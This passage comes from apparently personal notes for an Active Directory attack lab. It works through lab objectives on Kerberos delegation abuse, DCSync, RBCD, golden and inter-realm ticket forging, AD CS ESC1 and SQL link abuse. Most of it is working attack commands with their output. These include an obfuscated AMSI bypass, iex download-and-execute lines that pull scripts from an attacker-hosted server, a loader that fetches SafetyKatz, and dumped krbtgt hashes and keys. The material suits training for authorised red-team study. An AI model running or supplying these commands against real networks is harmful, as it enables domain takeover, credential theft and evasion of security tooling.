/ticket:doIF1jCCBdKgAwIBBaEDAgEWooIE0TCCBM1hggTJMIIExaADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIkMCKgAwIBAqEbMBkbBmtyYnRndBsPTU9ORVlDT1JQLkxPQ0FMo4IEgzCCBH+gAwIBEqEDAgECooIEcQSCBG0zsEcixo1JCHbZbP82zobSQJjNPPUW2dL6en0nms/Mvn0IQw00f5sejRrVK167onrNxTy3j+uATLdX6afEzsv1ziTW11OBaIUirl3Ro0DVayVkPMU62sicmmLSGA0JbJkHsXTSV2us7SX1B37i6EfKNUAW24EPzjlJSn5uyT3DcMy3r8PRY1N1xI9ev1A0QKqS9VG0oAnl4vcCJpEnNvg5r8wmzc87J4ooAXe/MpGwkEvsUxQ2NNrdiBsRX404gI4OraaXMFqreHwQ0XNOCs/xciAszBh688g6I90OBin+a+Abfl34ZZL8JG81JVUtXKk1M4wFqTYg+ldc7A5VkwlKcN6bwFgT4B0M6IR3IfSx9eAXA5IXwrrD1M0idilE1YWiP8kmxLtxLZyKEO8I5fLMcfYh3BykS6kFs1/ysqVYeDP0wuidTZnhK3RsFIO6G/+EOWtF1VROEalqKUuGc9gSMoZ/OUS2mSYLhZhobmoa3bsqLKYBILTfVjHLu8QdUchJgu1cW5edi3WNrLnqsac+1nXt8OKeBVuAEmUZKsjT/9aIBor8R12GBElZwEbA7aRSIYJ0jqJAbGBZf1o4Z+jzEucVUFJwbWe2YJxX2VF4EKjXTt8+hcxBS6S0TaDmMJOQqHVYjoT1HR6T+BURHbIQkKVd4Gd60iA17sm2NYZFFF5pjmUcBHE7OaULUtiZXNUYZ1o210WsyaxFT1f5LjsDmWNDVuj/UdQHB71iouNxNc/eofavPC/QstZJ95fIYKuQa5nB9MIYrNvvF97Hn1M5Q258XxQ4kYThL3YgCJyGbdOu1ac/LgcHv8MBrH7kt6IZDF/2hzqVfVwBOVSYTY+lNv6OJLMIJcUNdjc5gGJVugYJPl5IjvzqxCiF9jWcjuP2n/cuPlwUjjzGSOkopT5CL6wrBpzvndJDbuWve4+5u5xTNaEdMLFIZIFnIxLzoI8vOab1dMYN+g06D7P6qnAqtOPih3sfLl14qV7yYcApG3+2a2CZ4XFxseK+TQposFSc0XDH+WThwMRb91KGyNwhQxQDAJdq0AockvMItW3Za5OJQEMzDsbsADDcjIecNfW6RQQa1bgHBPQomuF400AYTjhX9k4VEGy5JuUUH2ZeGB6BO+7cX5TAyqFPtQ8vlCQ6XGp3ceSarp1/gMpB1jNyxz33vMEcRd43Rs2d+tXIuz0kunqs5x5Sf0R0C9dyd/KoD39+Zjp+hO2bHoLj9JHluuxNAxBobaAJL4wcRomm2lQn/+n6O7lqGYKg5jyPMdck91/twHuOSBqrPuYC9NJjK+vOJ2NHQAjd8jgOBnCOW1aQKkFCk3GbD+eeA9wnKFqhqQ+lvqnY5aym4nmBK7MMwStZjHvFVN/SrsSP2hO5fNeKvDKfu71De3o0fnbLjqc6EvitNTAjrE8N5hgi1p232G+KC+QGVh1i+P6G0Da3xvopYMF+hcrdj6MdS9sewb8QWyFeXMk9+ev7I6qwdzUAY9XUppFFAaBAZOenLaOB8DCB7aADAgEAooHlBIHifYHfMIHcoIHZMIHWMIHToCswKaADAgESoSIEIG7FJdKXNkaTqTJ5TyKUAgbbt7JEdocWNzjmN542wBUOoREbD01PTkVZQ09SUC5MT0NBTKIWMBSgAwIBAaENMAsbCU1DT1JQLURDJKMHAwUAYKEAAKURGA8yMDIzMTIxODEzNTAxOVqmERgPMjAyMzEyMTgyMzUwMTlapxEYDzIwMjMxMjI1MDQyMDA4WqgRGw9NT05FWUNPUlAuTE9DQUypJDAioAMCAQKhGzAZGwZrcmJ0Z3QbD01PTkVZQ09SUC5MT0NBTA== 2049 | ``` 2050 | 2051 | 2052 | - Now, we can run the DCSync attack from this process: 2053 | 2054 | 2055 | ```powershell 2056 | C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit" 2057 | ``` 2058 | 2059 | 2060 | **Awesome ! We escalated to Enterprise Admins too! ** 2061 | 2062 | *** 2063 | 2064 | >[!bug] Learning Objective 16 2065 | > - Enumerate users in the domain for whom Constrained Delegation is enabled. 2066 | > - For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured. 2067 | > - Pass the ticket and access the service. 2068 | > - Enumerate computer accounts in the domain for which Constrained Delegation is enabled. 2069 | > - For such a user, request a TGT from the DC. 2070 | > - Use the TGS for executing the DCSync attack. 2071 | > # Solution -: 2072 | 2073 | 2074 | 2075 | ### **Task 1** 2076 | 2077 | - Enumerate users with constrained delegation -: 2078 | 2079 | 2080 | 2081 | ```powershell 2082 | # Load powerview 2083 | . C:\AD\Tools\PowerView.ps1 2084 | 2085 | 2086 | Get-DomainUser -TrustedToAuth 2087 | ``` 2088 | 2089 | 2090 | 2091 | ![](https://i.imgur.com/eznsBTk.png) 2092 | 2093 | > [!todo] The `TRUSTED_TO_AUTH_FOR_DELEGATION` tag must also be set under the **"useraccountcontrol :"** property 2094 | 2095 | 2096 | 2097 | > [!info] We already have secrets of `websvc` from `dcorp-adminsrv` machine (Check On your bookmarks to see how to do that). We can either use `Kekeo` or `Rubeus` to abuse that. 2098 | 2099 | 2100 | 2101 | **Abuse Constrained Delegation using `websvc` with `Rubeus`** 2102 | 2103 | 2104 | Request **TGS** for '`websvc`' as Domain Administrator ('**Administrator**') and use it to access 'file system' on `dcorp-mssql` 2105 | 2106 | 2107 | ```powershell 2108 | C:\AD\Tools\Rubeus.exe s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt 2109 | ``` 2110 | 2111 | - Check if the ticket was injected successfully 2112 | 2113 | ```powershell 2114 | klist 2115 | ``` 2116 | 2117 | 2118 | ![](https://i.imgur.com/TqM14GA.png) 2119 | 2120 | 2121 | - Try accessing file system on dcorp-mssql 2122 | 2123 | ```powershell 2124 | dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$ 2125 | ``` 2126 | 2127 | 2128 | ![](https://i.imgur.com/WnEumFU.png) 2129 | 2130 | 2131 | > [!important] Incase you wanna use `kekeo` instead of `rubeus`, check "**Abuse Constrained Delegation using websvc with Kekeo**" in lab manual 2132 | 2133 | 2134 | ### **Task 2** 2135 | 2136 | For the **next task**, enumerate the computer accounts with constrained delegation enabled using `PowerView` -: 2137 | 2138 | 2139 | 2140 | ```powershell 2141 | # Load powerview 2142 | . C:\AD\Tools\PowerView.ps1 2143 | 2144 | Get-DomainComputer -TrustedToAuth 2145 | ``` 2146 | 2147 | 2148 | 2149 | ![](https://i.imgur.com/jYyiptn.png) 2150 | 2151 | 2152 | 2153 | **Abuse Constrained Delegation using dcorp-adminsrv with `Rubeus`** 2154 | 2155 | 2156 | 2157 | Run the following command from an elevated command prompt to use the obtained AES keys of `dcorp-adminsrv$` for `SafetyKatz` DCSync 2158 | 2159 | ```powershell 2160 | C:\AD\Tools\Rubeus.exe s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt 2161 | ``` 2162 | 2163 | > [!summary] Incase you wanna extracts creds(secrets), for instance the **AES Keys**, check your bookmarks on how to do that 2164 | 2165 | 2166 | 2167 | - Run the below command to abuse the LDAP ticket (Perform `DcSync` attack) 2168 | 2169 | 2170 | 2171 | ```powershell 2172 | C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit" 2173 | ``` 2174 | 2175 | 2176 | **_Output -:_** 2177 | 2178 | 2179 | ```Output 2180 | ** SAM ACCOUNT ** 2181 | 2182 | SAM Username : krbtgt 2183 | Account Type : 30000000 ( USER_OBJECT ) 2184 | User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT ) 2185 | Account expiration : 2186 | Password last change : 11/11/2022 9:59:41 PM 2187 | Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502 2188 | Object Relative ID : 502 2189 | 2190 | Credentials: 2191 | Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986 2192 | ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986 2193 | lm - 0: ea03581a1268674a828bde6ab09db837 2194 | 2195 | Supplemental Credentials: 2196 | * Primary:NTLM-Strong-NTOWF * 2197 | Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd 2198 | 2199 | * Primary:Kerberos-Newer-Keys * 2200 | Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt 2201 | Default Iterations : 4096 2202 | Credentials 2203 | aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 2204 | aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e 2205 | des_cbc_md5 (4096) : 150ea2e934ab6b80 2206 | ``` 2207 | 2208 | 2209 | > [!important] Incase you wanna use `kekeo` instead of `rubeus`, check "**Abuse Constrained Delegation using dcorp-adminsrv with Kekeo**" in lab manual 2210 | 2211 | 2212 | 2213 | 2214 | 2215 | 2216 | > [!bug] **Learning Objective 17** 2217 | > - Find a computer object in dcorp domain where we have Write permissions. 2218 | > - Abuse the Write permissions to access that computer as Domain Admin. 2219 | > # Solution -: 2220 | 2221 | 2222 | - Start up a PowerShell session using **Invisi-Shell** 2223 | - Enumerate Write permissions for a user that we have compromised -: 2224 | 2225 | 2226 | ```powershell 2227 | # Load invisi-shell 2228 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 2229 | 2230 | # Enum writes for all users 2231 | Find-InterestingDomainACL | select IdentityReferenceName, ActiveDirectoryRights 2232 | 2233 | # Enum writes for a specific user 2234 | Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'} 2235 | 2236 | # Note that the most important output from 'ActiveDirectoryRights' 2237 | # is the 'GenericWrite', this is what we are looking for 2238 | ``` 2239 | 2240 | ![](https://i.imgur.com/y2OEHoP.png) 2241 | 2242 | 2243 | > [!hint] After trying from multiple users or using BloodHound we would know that the user `ciadmin` has Write permissions on the computer object of `dcorp-mgmt` (the Jenkins instance) 2244 | 2245 | 2246 | ![](https://i.imgur.com/6rB9mxo.png) 2247 | 2248 | 2249 | - Let's use the reverse shell that we have and load `PowerView` there 2250 | - Go ahead and get a reverse shell as `ciadmin` with the **Jenkins** instance 2251 | - Make sure to host `sbloggingbypass.txt` on **HFS** 2252 | 2253 | ```powershell 2254 | PS C:\Users\Administrator\.jenkins\workspace\Projectx> iex (iwr http://172.16.100.X/sbloggingbypass.txt -UseBasicParsing) 2255 | ``` 2256 | 2257 | - Load AMSI bypass 2258 | 2259 | ```powershell 2260 | S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) 2261 | ``` 2262 | 2263 | - Transfer `Powerview` to the **Jenkins** instance 2264 | - Make sure to host `PowerView.ps1` on **HFS** 2265 | 2266 | ```powershell 2267 | PS C:\Users\Administrator\.jenkins\workspace\Projectx> iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1')) 2268 | ``` 2269 | 2270 | - Establish **Resource-Based Constrained Delegation** (RBCD) on `dcorp-mgmt` for **Student VMs**, Consider Applying to All Lab Instances for Collaborative Exploration 2271 | 2272 | ```powershell 2273 | PS C:\Users\Administrator\.jenkins\workspace\Projectx> Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-stdX$' -Verbose 2274 | ``` 2275 | 2276 | 2277 | - Check if RBCD is set correctly: 2278 | 2279 | ```powershell 2280 | PS C:\Users\Administrator\.jenkins\workspace\Projectx> Get-DomainRBCD 2281 | ``` 2282 | 2283 | 2284 | ![](https://i.imgur.com/N5ct63j.png) 2285 | 2286 | - Get AES keys of your student VM (as we configured RBCD for it above) 2287 | - Run the below command from a new `MS-DOS` session with elevated privileges 2288 | 2289 | 2290 | 2291 | 2292 | ```powershell 2293 | C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -Command "sekurlsa::ekeys" "exit" 2294 | ``` 2295 | 2296 | 2297 | 2298 | ![](https://i.imgur.com/yiMBe7G.png) 2299 | 2300 | 2301 | 2302 | - With `Rubeus`, abuse the RBCD to access `dcorp-mgmt` as Domain Administrator - Administrator 2303 | - Also do this in the new spawned process 2304 | 2305 | 2306 | ```powershell 2307 | C:\AD\Tools\Rubeus.exe s4u /user:dcorp-student505$ /aes256:f1f7973b711431dd18fa189632d5a99dfd2ac53520f0acc94be75d55cd236535 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt 2308 | ``` 2309 | 2310 | 2311 | - Check if we can access `dcorp-mgmt` 2312 | 2313 | 2314 | ```powershell 2315 | winrs -r:dcorp-mgmt cmd 2316 | ``` 2317 | 2318 | 2319 | ![](https://i.imgur.com/WFCFcrG.png) 2320 | 2321 | 2322 | 2323 | 2324 | 2325 | 2326 | 2327 | > [!bug] **Learning Objective 18** 2328 | > - Using DA access to `dollarcorp.moneycorp.local`, escalate privileges to Enterprise Admin or DA to the parent domain, `moneycorp.loca`l using the domain trust key. 2329 | > # Solution -: 2330 | 2331 | 2332 | 2333 | 2334 | 2335 | 2336 | 2337 | ### **Step 1 - Retrieve Trust Key for dollarcorp and moneycrop Trust using Mimikatz or SafetyKatz.** 2338 | 2339 | 2340 | 2341 | - Start a process with DA privileges (Run command from elevated prompt) 2342 | 2343 | 2344 | 2345 | ```powershell 2346 | C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 2347 | ``` 2348 | 2349 | 2350 | **_Using `SafetyKatz.exe` -:_** 2351 | 2352 | Execute the following commands from the process running as Domain Admin to copy `Loader.exe` to **dcorp-dc** and leverage it for extracting credentials, considering potential variations in the trust key for your lab instance 2353 | 2354 | ```powershell 2355 | # copy loader.exe to dcorp-dc 2356 | echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y 2357 | 2358 | # spawn interactive shell on dcorp-dc 2359 | winrs -r:dcorp-dc cmd 2360 | 2361 | # set up port forwarding 2362 | netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.X 2363 | 2364 | # Load loader.exe on memory of dcorp-dc 2365 | # Make sure to host SafetyKatz.exe on HFS first 2366 | C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe 2367 | 2368 | # Extract credentials on the new mimikatz session 2369 | lsadump::trust /patch 2370 | ``` 2371 | 2372 | 2373 | 2374 | ![](https://i.imgur.com/M3Jt8fB.png) 2375 | 2376 | 2377 | ### **Step 2 - Use the extracted information to forge a ticket** 2378 | 2379 | 2380 | - Forge a ticket with SID History of Enterprise Admins. Run the below command from an elevated command prompt 2381 | 2382 | 2383 | ```powershell 2384 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-500 /rc4:a9c7b4087bf715f859361ad3c3331488 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit" 2385 | ``` 2386 | 2387 | 2388 | 2389 | > [!note] Incase you don't know the `/sids:` of the enterprise admin, we talked about it earlier during **Enumeration**, so check your bookmark 🤪 2390 | 2391 | 2392 | 2393 | 2394 | - Use the ticket with Rubeus: 2395 | 2396 | 2397 | 2398 | ```powershell 2399 | C:\AD\Tools\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt 2400 | ``` 2401 | 2402 | ### **Step 3 - Try access the file system of Enterprise admin (`mcorp-dc`)** 2403 | 2404 | - Check if we can access file system on `mcorp-dc`! 2405 | 2406 | 2407 | ```powershell 2408 | dir \\mcorp-dc.moneycorp.local\c$ 2409 | ``` 2410 | 2411 | 2412 | ![](https://i.imgur.com/5mriKLe.png) 2413 | 2414 | 2415 | 2416 | 2417 | 2418 | 2419 | 2420 | 2421 | > [!bug] **Learning Objective 19** 2422 | > - Using DA access to `dollarcorp.moneycorp.local`, escalate privileges to Enterprise Admin or DA to the parent domain, `moneycorp.local` using **dollarcorp's** krbtgt hash. 2423 | > # Solution -: 2424 | 2425 | 2426 | 2427 | 2428 | - We already have the krbtgt hash from **dcorp-dc** using `DCsync` attack. Let's create the inter-realm TGT and inject. Run the below command from an elevated command prompt 2429 | 2430 | 2431 | ```powershell 2432 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-500 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit" 2433 | ``` 2434 | 2435 | 2436 | - Let's check if we can access `mcorp-dc` -: 2437 | 2438 | 2439 | 2440 | ```powershell 2441 | dir \\mcorp-dc.moneycorp.local\c$ 2442 | ``` 2443 | 2444 | 2445 | 2446 | ![](https://i.imgur.com/TWKp7Qz.png) 2447 | 2448 | 2449 | - Let's run DCSync against `mcorp-dc` to extract secrets from it 2450 | 2451 | 2452 | ```powershell 2453 | C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit" 2454 | ``` 2455 | 2456 | 2457 | **_Output -:_** 2458 | 2459 | ``` 2460 | 2461 | ** SAM ACCOUNT ** 2462 | 2463 | SAM Username : krbtgt 2464 | Account Type : 30000000 ( USER_OBJECT ) 2465 | User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT ) 2466 | Account expiration : 2467 | Password last change : 11/11/2022 9:46:24 PM 2468 | Object Security ID : S-1-5-21-335606122-960912869-3279953914-502 2469 | Object Relative ID : 502 2470 | 2471 | Credentials: 2472 | Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf 2473 | ntlm- 0: a0981492d5dfab1ae0b97b51ea895ddf 2474 | lm - 0: 87836055143ad5a507de2aaeb9000361 2475 | 2476 | Supplemental Credentials: 2477 | * Primary:NTLM-Strong-NTOWF * 2478 | Random Value : 7c7a5135513110d108390ee6c322423f 2479 | 2480 | * Primary:Kerberos-Newer-Keys * 2481 | Default Salt : MONEYCORP.LOCALkrbtgt 2482 | Default Iterations : 4096 2483 | Credentials 2484 | aes256_hmac (4096) : 90ec02cc0396de7e08c7d5a163c21fd59fcb9f8163254f9775fc2604b9aedb5e 2485 | aes128_hmac (4096) : 801bb69b81ef9283f280b97383288442 2486 | des_cbc_md5 (4096) : c20dc80d51f7abd9 2487 | ``` 2488 | 2489 | 2490 | 2491 | > [!bug] **Learning Objective 20** 2492 | > - With DA privileges on `dollarcorp.moneycorp.local`, get access to `SharedwithDCorp` share on the DC of `eurocorp.local` forest. 2493 | > # Solution -: 2494 | 2495 | 2496 | **We first need to Retrieve Trust Key for dollarcorp and eurocorp Trust using Mimikatz or SafetyKatz** 2497 | 2498 | - Start a process with DA privileges. Run command from an elevated command prompt: 2499 | 2500 | 2501 | ```powershell 2502 | C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 2503 | ``` 2504 | 2505 | 2506 | - Run below commands from the process running as DA to copy `Loader.exe` on **dcorp-dc** and use it to extract credentials. Note that the trust key may be different in your lab instance: 2507 | 2508 | 2509 | ```powershell 2510 | # copy loader.exe to dcorp-dc 2511 | echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y 2512 | 2513 | # get interactive shell 2514 | winrs -r:dcorp-dc cmd 2515 | 2516 | # enable port forwarding 2517 | netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x 2518 | 2519 | # Make sure to host SafetyKatz.exe on HFS 2520 | C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe 2521 | 2522 | # Extract credentials on the new mimikatz session 2523 | lsadump::trust /patch 2524 | ``` 2525 | 2526 | 2527 | **_Example -:_** 2528 | 2529 | 2530 | 2531 | ![](https://i.imgur.com/qORWHVc.png) 2532 | 2533 | 2534 | 2535 | > [!note] Make sure you don't make the mistake of copying the trust key (rc4_hmac_nt), of `MONEYCORP.LOCAL` instead of `EUROCORP.LOCAL` as used in the below command "`/rc4:`", scrolling down a little bit on the command output will help 2536 | 2537 | 2538 | 2539 | 2540 | 2541 | - Forge an inter-realm **TGT**. Run command from an elevated command prompt 2542 | 2543 | 2544 | ```powershell 2545 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:ed74fa2b5cfd5ab0fb7ace3d8a7b6c04 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit" 2546 | ``` 2547 | 2548 | 2549 | 2550 | 2551 | - Now Use the ticket with `Rubeus`: 2552 | 2553 | 2554 | 2555 | 2556 | 2557 | ```powershell 2558 | C:\AD\Tools\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt 2559 | ``` 2560 | 2561 | 2562 | 2563 | 2564 | 2565 | - Now Check if we can access explicitly shared resources `eurocorp-dc` 2566 | 2567 | 2568 | ```powershell 2569 | dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\ 2570 | ``` 2571 | 2572 | 2573 | 2574 | **_Example_** 2575 | 2576 | 2577 | ![](https://i.imgur.com/2aCMqVc.png) 2578 | 2579 | 2580 | 2581 | > [!hint] You can also use `Invoke-Mmimkatz` and `old Kekeo`, check lab manual as i won't discuss here 2582 | 2583 | 2584 | > [!bug] **Learning Objective 21** 2585 | > - Check if AD CS is used by the target forest and find any vulnerable/abusable templates. 2586 | > - Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin. 2587 | > # Solution -: 2588 | 2589 | 2590 | ### **Enumerate Templates** 2591 | 2592 | 2593 | - We can use the `Certify` tool to check for **AD CS** in `moneycorp`. 2594 | 2595 | 2596 | ```powershell 2597 | C:\AD\Tools\Certify.exe cas 2598 | ``` 2599 | 2600 | 2601 | 2602 | 2603 | 2604 | **_Important Output_** 2605 | 2606 | 2607 | 2608 | 2609 | ![](https://i.imgur.com/2sHEFFu.png) 2610 | 2611 | 2612 | - We can list all the templates using the following command. Going through the output we can find some interesting templates 2613 | 2614 | 2615 | ```powershell 2616 | C:\AD\Tools\Certify.exe find 2617 | ``` 2618 | 2619 | 2620 | 2621 | 2622 | **_Important Output_** 2623 | 2624 | 2625 | 2626 | 2627 | ![](https://i.imgur.com/X39odqU.png) 2628 | 2629 | 2630 | 2631 | > [!note] The template "`HTTPSCertificates`" allows enrollment to the RDPUsers group, which we are able to access 2632 | 2633 | 2634 | 2635 | 2636 | ## **Privilege Escalation to DA and EA using `ESC1` The template** 2637 | 2638 | ### **Domain Admin** 2639 | 2640 | 2641 | 2642 | - `HTTPSCertificates` looks interesting. Let's get some more information about it as it allows requestor to supply subject name: 2643 | 2644 | 2645 | 2646 | 2647 | ```powershell 2648 | C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject 2649 | ``` 2650 | 2651 | 2652 | 2653 | 2654 | **_important Output_** 2655 | 2656 | 2657 | 2658 | 2659 | ![](https://i.imgur.com/VJtq7Oe.png) 2660 | 2661 | 2662 | 2663 | 2664 | 2665 | 2666 | > [!note] Sweet! The `HTTPSCertificates` template grants enrollment rights to `RDPUsers` group and allows requestor to supply Subject Name. Recall that `studentx` is a member of `RDPUsers` group. This means that we can request certificate for any user as `studentx` . 2667 | 2668 | 2669 | - Request a certificate for Domain Admin - Administrator 2670 | 2671 | 2672 | ```powershell 2673 | C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator 2674 | ``` 2675 | 2676 | 2677 | 2678 | > [!note] 2679 | > Copy all the text between `-----BEGIN RSA PRIVATE KEY----- `and `-----END CERTIFICATE-----` and save it to `esc1.pem`. 2680 | 2681 | 2682 | - Convert the obtained credentials to `PFX` format using the `openssl` binary on the student VM, using '`SecretPass`' as the export password. 2683 | - Note that you have to type the password manually 2684 | 2685 | 2686 | 2687 | ```powershell 2688 | C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx 2689 | ``` 2690 | 2691 | 2692 | 2693 | - Use the `PFX` created above with `Rubeus` to request a TGT for DA - Administrator! 2694 | 2695 | 2696 | ```powershell 2697 | C:\AD\Tools\Rubeus.exe asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass /ptt 2698 | ``` 2699 | 2700 | 2701 | 2702 | 2703 | 2704 | **_Example_** 2705 | 2706 | 2707 | 2708 | 2709 | ![](https://i.imgur.com/5UhVvcu.png) 2710 | 2711 | 2712 | 2713 | - Check if we actually have DA privileges now: 2714 | 2715 | 2716 | ```powershell 2717 | winrs -r:dcorp-dc whoami 2718 | ``` 2719 | 2720 | 2721 | 2722 | 2723 | **_Example_** 2724 | 2725 | 2726 | 2727 | ![](https://i.imgur.com/efsSAKN.png) 2728 | 2729 | 2730 | 2731 | ### **Enterprise Admin** 2732 | 2733 | 2734 | 2735 | - We can use similar method to escalate to Enterprise Admin privileges. Request a certificate for Enterprise Administrator - Administrator 2736 | 2737 | 2738 | 2739 | 2740 | ```powershell 2741 | C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator 2742 | ``` 2743 | 2744 | 2745 | 2746 | 2747 | 2748 | > [!note] 2749 | > Difference in `/altname`, Then go ahead and save the certificate and save it as `esc1-EA.pem`. 2750 | 2751 | 2752 | 2753 | 2754 | 2755 | 2756 | - Now convert it to `PFX`. I will use `SecretPass` as the export password 2757 | - Don't forget to type password manually 2758 | 2759 | 2760 | ```powershell 2761 | C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-EA.pfx 2762 | ``` 2763 | 2764 | 2765 | 2766 | 2767 | - Use `Rubeus` to request TGT for Enterprise Administrator - Administrator 2768 | 2769 | 2770 | ```powershell 2771 | C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass /ptt 2772 | ``` 2773 | 2774 | 2775 | 2776 | **_Example_** 2777 | 2778 | 2779 | 2780 | ![](https://i.imgur.com/fj7iPVu.png) 2781 | 2782 | 2783 | - Finally, access `mcop-dc` !! 2784 | 2785 | 2786 | 2787 | 2788 | ```powershell 2789 | winrs -r:mcorp-dc cmd 2790 | ``` 2791 | 2792 | 2793 | 2794 | 2795 | **_Example_** 2796 | 2797 | 2798 | 2799 | ![](https://i.imgur.com/bbr0YzC.png) 2800 | 2801 | 2802 | 2803 | > [!tip] To know how to do **Privilege Escalation to DA and EA using `ESC3` and `ESC6`**, Check Lab Manual, I only practiced it, but did not take notes, in the exam lab, make sure to refer to lab manual and check both of them 2804 | 2805 | 2806 | 2807 | 2808 | 2809 | 2810 | > [!bug] **Learning Objective 22** 2811 | > - Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql. 2812 | > # Solution -: 2813 | 2814 | 2815 | **We start with enumerating SQL servers in the domain and if `studentx` has privileges to connect to any of them. We can use `PowerUpSQL` module for that** 2816 | 2817 | - Start up a session with `invisi-shell` 2818 | 2819 | ```powershell 2820 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 2821 | ``` 2822 | 2823 | 2824 | - Load `PowerUpSQl` 2825 | 2826 | 2827 | ```powershell 2828 | Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1 2829 | ``` 2830 | 2831 | 2832 | 2833 | 2834 | - Now enumerate `SQL` servers 2835 | 2836 | 2837 | 2838 | 2839 | ```powershell 2840 | Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose 2841 | ``` 2842 | 2843 | 2844 | 2845 | ![](https://i.imgur.com/4HTrzoo.png) 2846 | 2847 | 2848 | - We can then use `Get-SQLServerLinkCrawl` for crawling the database links automatically 2849 